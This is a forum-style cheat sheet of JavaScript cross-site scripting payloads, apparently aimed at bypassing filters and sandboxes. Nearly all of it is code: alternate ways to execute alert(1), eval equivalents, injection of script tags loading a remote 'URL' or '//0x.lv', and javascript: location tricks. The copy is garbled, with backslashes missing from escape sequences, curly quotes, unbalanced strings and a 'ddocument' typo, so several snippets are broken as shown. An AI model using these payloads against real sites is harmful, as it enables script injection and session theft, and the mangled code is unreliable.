javascript中一些另類的用法

/*
* I will be updating this thread when I have time with the replies.. any mods fell free to help.
*/

//Direct execution

Quote

window["alert"](1);//this["alert"],self["alert"],etc.. see references to window

Quote

self[<>alert</>](1);//JS1.6+

Quote

self[<><![CDATA[alert]]></>](1);

Quote

top/**/[x61x6cx65x72x74]/**/(1);

Quote

u0061lert(1),alertu000a(1);

Quote

(ä=#1={}&&alert)(ä);//ff only

Quote

alert.valueOf().call(self,1);

Quote

[alert.valueOf()][0].valueOf()(1);

Quote

{x/*@cc_on=alert@*/}x/*@(/xss/@*/); // ie only

Quote

({__noSuchMethod__:Function}).aaaaa$$$$$$$$$dddddddfffffff_____(“alert(1)”)()//ff only

Quote

//ff only
location.__noSuchMethod__=location.replace;location["javascript:alert(1)"]();
window.__noSuchMethod__=setTimeout;window["alert(2)"]();

Quote

“”+{toString:alert}//code execution with no [=()], doesnt work on FF with native functions

Quote

1*({valueOf:alert})//code execution with no [=()], doesnt work on FF with native functions

Quote

a setter=alert;a=”hello”;// function execution without [()] ff only

//Evaluate code

Quote

eval(“alert(1)”);

Quote

setTimeout(“alert(1)”);

Quote

setInterval(“alert(1)”);//lots of alerts..

Quote

Function(“alert(1)”)();

Quote

self[(typeof prompt).replace(/^./,String.toUpperCase)](“alert(1)”)();

Quote

[].constructor.constructor(‘alert(1)’)();

Quote

execScript(“alert(1)”);//IE only

Quote

window[<>eval</>](name);//JS1.6+

Quote

‘alert(“xss”)’.replace(/.*/g,eval)

//Generate/add script tags

Quote

with(document)body.previousSibling.appendChild(createElement(‘script’)).src=’URL’

Quote

with(document)querySelector(‘head’).appendChild(createElement(‘script’)).src=’URL’

Quote

with(a=<script />)a.@src=’URL’,a.toXMLString();//FF only, generates the string only (doesn’t execute)

Quote

with(document)body.previousSibling.appendChild(createElementNS(‘http://www.w3.org/1999/xhtml’,html:script’)).src=’URL’

//Virtual DOM (execution before appendChild, for escaping sandboxes)

Quote

//IE only
document.createElement(“html”).appendChild(document.createElement(“script”)).text=”alert(‘ie sucks’)”;
ddocument.createElement(“html”).appendChild(document.createElement(“script”)).setAttribute(‘src’,//0x.lv’);

Quote

//WebKit only (Chrome/Safari)
document.createElementNS(“http://www.w3.org/1999/xhtml”,”html”).innerHTML=’<html:head><meta http-equiv=”Refresh” content=”0;URL=javascript:alert(/HACKED/);”></html:head>’;

Quote

//FF only
document.createElement(“pre”).innerHTML=”<img onerror=’alert(1)’ src=’./>”;
with(new Image)setAttribute(‘onerror’,alert(1)’),src=’.;
with(document.createElement(“img”))setAttribute(‘onerror’,alert(1)’),setAttribute(‘src’,’.’);
new Option().innerHTML=”<img src=’.’ onerror=alert(1)>”;//tip: [new Option][0][name]=location.hash // name=innerHTML location.hash=<img src…

Quote

// Opera only
new Image().src=”javascript:alert(1234)”;
document.createElement(‘img’).src=”javascript:alert(1234)”;

//Location

Quote

location=’javascript:alert(1)’;

Quote

location.assign(‘javascript:alert(1)’);

Quote

location.replace(‘javascript:alert(1)’);

Quote

// supossing the url is http://victim/asdf/#%0aalert(1) (ie only)
location.protocol=’javascript’;

Quote

document.URL=’javascript:alert(1)’;//ie

Quote

location=Namespace(‘javascript:x61lert(1)’).uri//ff

Quote

frameElement.src=’javascript:alert(1)’;/*requires to be framed in same origin (frame a page with a frame and do frames[0].frames[0].location=”xss victim”)*/

//Etc..

Quote

<meta http-equiv=refresh content=,url=xss.swf>

Quote

document.styleSheets(0).cssText=name;//IE only

——————————–
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat